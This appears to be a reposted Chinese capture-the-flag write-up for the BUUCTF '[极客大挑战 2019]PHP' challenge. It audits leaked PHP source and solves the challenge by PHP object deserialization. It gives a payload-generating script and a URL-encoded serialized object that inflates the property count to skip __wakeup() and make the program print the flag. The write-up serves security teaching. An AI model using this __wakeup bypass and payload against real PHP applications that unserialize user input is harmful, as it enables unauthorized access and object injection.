PHP教程
[极客大挑战 2019]PHP BUUCTF靶场
本文主要是介绍[极客大挑战 2019]PHP BUUCTF靶场,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
源码泄露
进入主页先扫一下后台
然后把源码下载下来
代码审计
index.php
<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>
主页通过get方式传入参数'select' ,并且对select参数反序化操作,这里猜到可能会是出题点,可能通过触发魔法函数来触发漏洞
class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
这里看到三个魔法函数:
__construct:
当一个对象创建时调用(constructor)
__sleep:
方法在一个对象被序列化时调用
__wakeup:
方法在一个对象被反序列化时调用,这里可以看到当触发这个函数的时候后台把username强制改为'guest'。
__destruct:
当一个对象被销毁时调用(destructor),这里可以看到当触发这个魔法函数时,如果username=‘admin’,password=‘100’,就会把flag输出出来了。
利用思路:
我们需要实例化一个对象Name,并且Name中的username的参数为'admin',password的参数为100,但是网站入口处会对内容进行反序列化,此时会触发__wakeup()和__destruct()魔法函数,但是__wakeup魔法函数会对我们的username参数进行重新赋值,所以需要绕过这个函数。
__wakeup()函数绕过
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。
例:
O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} //把红色位置的数字改大即可绕过__wakeup()魔法函数的自动触发
构造payload:
<?php
class Name{
private $username = 'admin';
private $password = 100;
}
$a = new Name();
var_dump(serialize($a));
echo urlencode(serialize($a));//因为是私有属性所以要进行url编码,我也不知道为什么
?>
把这个数字改为比2大的数就行了
?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
flag打出来了
这篇关于[极客大挑战 2019]PHP BUUCTF靶场的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
开源 PHP 商城项目 CRMEB 二次开发和部署教程11-11
-
怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享11-09
-
PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享11-05
-
开源 PHP 商城项目 CRMEB 安装和使用教程11-01
-
用php和mysql写无限分类,有哪几种方法-icode9专业技术文章分享11-01
-
php数据分表导出时部分数据无法导出什么原因-icode9专业技术文章分享10-31
-
有经验的 PHP 开发者学习一门新的编程语言,有哪些推荐的有前景的语言-icode9专业技术文章分享10-30
-
php 检测图片是否篡改过-icode9专业技术文章分享10-21
-
fruitcake/php-cors 该怎么使用-icode9专业技术文章分享10-20
-
PHP7.1可以使用哪个版本的swoole-icode9专业技术文章分享10-18
-
php8 执行php -v提示 command not found是什么原因?-icode9专业技术文章分享10-17
-
nginx 怎么配置 php?-icode9专业技术文章分享10-17
-
怎么把PHP程序打包?-icode9专业技术文章分享09-28
-
怎么用Phar打包PHP程序?-icode9专业技术文章分享09-28
-
手动在github上下载的mfpt包,怎么放到thinkphp5.0框架并正常使用-icode9专业技术文章分享09-13
栏目导航
